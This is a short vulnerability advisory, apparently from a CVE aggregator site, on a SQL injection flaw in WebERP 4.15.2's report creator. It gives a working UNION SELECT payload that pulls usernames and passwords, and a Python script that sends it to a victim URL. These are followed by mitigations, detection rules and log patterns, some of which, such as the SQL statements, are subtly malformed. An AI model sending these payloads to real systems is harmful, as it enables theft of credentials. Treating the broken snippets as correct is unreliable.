WebERP, SQL Injection, CVE-2025-46053 (Critical)

By /

Listen to this Post

How the Vulnerability Works

CVE-2025-46053 is a critical SQL Injection flaw in WebERP v4.15.2, allowing attackers to manipulate database queries via the `ReportID` and `ReplaceReportID` parameters in /reportwriter/admin/ReportCreator.php. The application fails to sanitize user-supplied input before concatenating it into SQL queries. Attackers can craft malicious POST requests with payloads like `’ OR 1=1–` to bypass authentication, dump database contents, or execute arbitrary commands. The vulnerability stems from improper input validation in the report generation module, where attacker-controlled parameters are directly embedded into dynamic SQL statements without prepared statements or parameterized queries.

DailyCVE Form

Platform: WebERP
Version: 4.15.2
Vulnerability: SQL Injection
Severity: Critical
Date: 06/12/2025

Prediction: Patch expected by 07/10/2025

What Undercode Say:

Exploitation

1. Craft Malicious POST Request:

POST /reportwriter/admin/ReportCreator.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
ReportID=1' UNION SELECT username,password FROM users--&ReplaceReportID=1

2. Automated Exploit (Python):

import requests
target = "http://victim.com/reportwriter/admin/ReportCreator.php"
payload = {"ReportID": "1' UNION SELECT 1,@@version--", "ReplaceReportID": "1"}
r = requests.post(target, data=payload)
print(r.text)

Protection

1. Input Sanitization:

$reportID = mysqli_real_escape_string($conn, $_POST['ReportID']);

2. Use Prepared Statements:

$stmt = $conn->prepare("SELECT FROM reports WHERE id = ?");
$stmt->bind_param("i", $_POST['ReportID']);
$stmt->execute();

3. WAF Rules (ModSecurity):

SecRule ARGS "@detectSQLi" "id:1000,deny,status:403"

4. Patch Verification:

curl -I http://target.com/ | grep X-Patched-Version

5. Database Hardening:

REVOKE ALL PRIVILEGES ON . FROM 'weberp_user'@'%';

6. Log Analysis Command:

grep "POST /reportwriter/admin" /var/log/apache2/access.log | grep -E "UNION|SELECT|--"

7. Mitigation Workaround:

location /reportwriter/admin {
deny all;
}

8. Exploit Detection (Snort Rule):

alert tcp any any -> $HOME_NET 80 (msg:"WebERP SQLi Attempt"; content:"ReportID="; nocase; pcre:"/UNION\s+SELECT/i";)

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top